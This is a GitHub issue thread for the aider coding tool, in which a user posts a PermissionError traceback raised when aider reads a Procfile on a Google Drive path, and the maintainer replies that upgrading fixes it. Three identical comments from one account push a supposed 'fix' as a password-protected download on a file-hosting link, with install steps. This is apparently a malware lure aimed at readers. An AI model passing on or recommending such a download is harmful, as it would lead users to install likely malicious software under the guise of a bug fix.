### ISSUE TITLE
Uncaught PermissionError in io.py line 240

### ISSUE THREAD

**Issue by nmiller24** [paul-gauthier/aider#1290]
Aider version: 0.54.8
Python version: 3.10.14
Platform: Windows-10-10.0.22631-SP0
Python implementation: CPython
Virtual environment: No
OS: Windows 10 (64bit)
Git version: git version 2.45.0.windows.1

An uncaught exception occurred:

```
Traceback (most recent call last):
  File "runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "__main__.py", line 7, in <module>
    sys.exit(main())
  File "main.py", line 680, in main
    coder.run()
  File "base_coder.py", line 728, in run
    self.run_one(user_message, preproc)
  File "base_coder.py", line 771, in run_one
    list(self.send_message(message))
  File "base_coder.py", line 1058, in send_message
    chunks = self.format_messages()
  File "base_coder.py", line 996, in format_messages
    chunks = self.format_chat_chunks()
  File "base_coder.py", line 901, in format_chat_chunks
    self.choose_fence()
  File "base_coder.py", line 495, in choose_fence
    for _fname, content in self.get_abs_fnames_content():
  File "base_coder.py", line 484, in get_abs_fnames_content
    content = self.io.read_text(fname)
  File "io.py", line 240, in read_text
    with open(str(filename), "r", encoding=self.encoding) as f:
PermissionError: [Errno 13] Permission denied: 'G:\\My Drive\\Aider\\aiderpython\\project\\Procfile'

```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by paul-gauthier** [comment]
Thanks for trying aider and filing this issue. This should be fixed in the latest version of aider. You should be able to upgrade with:

```
aider --upgrade
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
